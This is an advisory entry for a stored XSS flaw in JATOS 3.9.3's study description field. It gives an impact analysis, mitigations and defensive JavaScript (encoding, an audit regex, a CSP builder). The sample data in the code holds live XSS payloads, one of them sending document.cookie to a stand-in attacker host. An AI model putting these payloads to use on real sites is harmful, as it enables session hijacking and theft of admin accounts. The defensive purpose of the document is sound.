CVE-2024-51379: n/a
Stored Cross-Site Scripting (XSS) vulnerability discovered in JATOS v3.9.3. The vulnerability exists in the description component of the study section, where an attacker can inject JavaScript into the description field. This allows for the execution of malicious scripts when an admin views the description, potentially leading to account takeover and unauthorized actions.
AI Analysis
Technical Summary
CVE-2024-51379 is a stored cross-site scripting (XSS) vulnerability in JATOS version 3.9.3, a platform used to host and manage online studies and experiments. The flaw is in the description component of the study section: the description field is stored without adequate sanitization and rendered without output encoding, so an attacker can save arbitrary HTML and JavaScript in it. The payload persists on the server and executes in the browser of any administrator who later views the affected description. Because the victim holds admin rights, the injected script runs with those rights: it can issue requests in the admin's session, change study configurations, read or export study data, and potentially take over the application. The CVSS 3.1 base score of 8.4 reflects high impact on confidentiality, integrity and availability with a network attack vector and low attack complexity; it is tempered by the need for high privileges to plant the payload (an authenticated account that is allowed to edit a study's description) and for user interaction (an admin opening the study). In practice this means the realistic threat is a malicious or compromised researcher account rather than an anonymous participant. No patch or public exploit is listed at the time of this analysis, but the weakness matters for any deployment that relies on JATOS to manage sensitive research data.
Potential Impact
The vulnerability lets an attacker execute arbitrary JavaScript in the context of an administrator's browser. From there the script can act as the admin: take over the account, read participant data, and alter study data or configuration. That compromises the confidentiality of research data, the integrity of study results, and, if the script deletes or disables studies, the availability of the JATOS service. The script can also exfiltrate data to an attacker-controlled host, but it is limited to what the admin's browser can reach; on its own it does not give access to the server or the surrounding network. JATOS is used by academic and research institutions worldwide, so exploitation could disrupt research and damage an institution's reputation. Because an admin must view the poisoned description, mass exploitation is unlikely, but a targeted attack on a high-value research deployment is realistic.
Mitigation Recommendations
The durable fix belongs in the application: JATOS must HTML-encode the description wherever it is rendered (output encoding at the point of use is what stops XSS; input validation alone is not sufficient), and if rich text is required, pass it through an allowlist sanitizer. Operators should update JATOS as soon as a fixed version is released. Until then: restrict which accounts can create or edit study descriptions; audit existing descriptions for markup directly in the database or from a raw export rather than by opening them in the admin UI, since viewing a poisoned description is exactly what triggers the payload; deploy a Content Security Policy that disallows inline scripts and restricts script sources, which blocks the simplest payloads; set session cookies HttpOnly and Secure, which prevents cookie theft even though an injected script can still act inside the victim's session; keep the admin population small and monitor admin activity for unusual actions such as new users, permission changes or bulk exports; and put a web application firewall with XSS rules in front of JATOS as defence in depth, not as the primary control. Note that a stored XSS fires when the page renders, so telling administrators not to click untrusted content does not prevent this class of attack.
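As an added example, not code from JATOS or from this advisory, the following shows the rendering pattern behind the weakness described in the technical summary beside its encoded form, an audit helper that implements the "check the raw export, not the UI" step from the mitigations, and a Content Security Policy builder. The record shape `{ id, description }`, the function names, the sample study records and the payload strings are all constructed for illustration and are not JATOS's data model or implementation.

```javascript
// Added example, not JATOS code. Shows (1) the unencoded rendering pattern behind
// a stored XSS like CVE-2024-51379 next to its encoded counterpart, (2) an audit
// helper for triaging already-stored descriptions without rendering them, and
// (3) a Content-Security-Policy that blocks the simplest inline payloads.
// The record shape { id, description } and all sample strings are constructed.

// HTML-encode a value so it is inert in element content and inside double- or
// single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Vulnerable pattern: the stored description is concatenated into markup as-is,
// so "<script>...</script>" in the field becomes a script element in the admin's page.
function renderDescriptionUnsafe(study) {
  return `<div class="description" data-study="${study.id}">${study.description}</div>`;
}

// Hardened pattern: every untrusted value is encoded at the point of use, in the
// context where it lands (attribute value and element text here).
function renderDescriptionSafe(study) {
  return `<div class="description" data-study="${escapeHtml(study.id)}">` +
         `${escapeHtml(study.description)}</div>`;
}

// Triage helper for operators waiting on a patch: run it over a raw export of the
// descriptions (never over the admin UI, which would execute the payload) and get
// back the records containing tag-like markup, javascript: URLs or inline handlers.
// Deliberately broad: a false positive costs a manual look, a miss costs an admin session.
const MARKUP_RE = /<\/?[a-z!]|javascript:|on[a-z]+\s*=/i;
function auditDescriptions(studies) {
  return studies
    .filter((s) => MARKUP_RE.test(s.description))
    .map((s) => ({ id: s.id, snippet: s.description.slice(0, 60) }));
}

// CSP that refuses inline scripts and event handlers, which neutralises the
// <script> and onerror= payloads above even before the template is fixed.
// Extra script origins (a CDN, say) are passed explicitly; 'unsafe-inline' is never added.
function cspHeader(extraScriptSources = []) {
  const scriptSrc = ["'self'", ...extraScriptSources].join(' ');
  return [
    "default-src 'self'",
    `script-src ${scriptSrc}`,
    "object-src 'none'",
    "base-uri 'self'",
    "frame-ancestors 'self'",
  ].join('; ');
}

// Constructed sample export: two benign descriptions and two carrying payloads.
const SAMPLE_STUDIES = [
  { id: 's1', description: 'Reaction time study, 20 trials per block' },
  { id: 's2', description: "Memory task <script>fetch('https://attacker.example/?c=' + document.cookie)</script>" },
  { id: 's3', description: '<img src=x onerror="alert(document.domain)">' },
  { id: 's4', description: 'Compare conditions where a < b and b > c' },
];

console.log('flagged:', auditDescriptions(SAMPLE_STUDIES).map((s) => s.id));
console.log('safe render of s2:', renderDescriptionSafe(SAMPLE_STUDIES[1]));
console.log('CSP:', cspHeader());
```

The audit regex intentionally tolerates false positives (a description such as "a < b" is not flagged, but one mentioning "Condition=2" would be); the point is to get a short list to inspect in a text editor, not to render anything. The CSP is a complement to, not a substitute for, encoding in the template: a policy that still allows `'unsafe-inline'` would not stop either sample payload.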
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, Netherlands, Sweden, Switzerland, France, Japan, South Korea
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2024-10-28T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 699f6bb1b7ef31ef0b55a24a
Added to database: 2/25/2026, 9:37:53 PM
Last enriched: 2/28/2026, 2:55:56 AM
Last updated: 4/12/2026, 3:41:07 PM